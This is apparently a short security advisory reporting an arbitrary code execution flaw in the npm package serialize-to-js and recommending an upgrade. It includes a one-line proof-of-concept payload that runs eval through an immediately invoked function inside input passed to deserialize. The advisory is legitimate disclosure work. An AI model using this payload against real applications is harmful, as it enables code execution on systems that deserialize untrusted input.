Code Execution Through IIFE

2017-02-10T18:56:06
ID NODEJS:313
Type nodejs
Reporter Ajin Abraham
Modified 2018-03-21T22:09:23

Description

Overview

Affected versions of serialize-to-js may be vulnerable to arbitrary code execution through an Immediately Invoked Function Expression (IIFE).

Proof of Concept

var payload = "{e: (function(){ eval('console.log(`exploited`)') })() }" var serialize = require('serialize-to-js'); serialize.deserialize(payload);

Recommendation

Update to version 1.0.0, or later, and review this disclaimer from the author.

References

https://www.npmjs.com/package/serialize-to-js#deserialize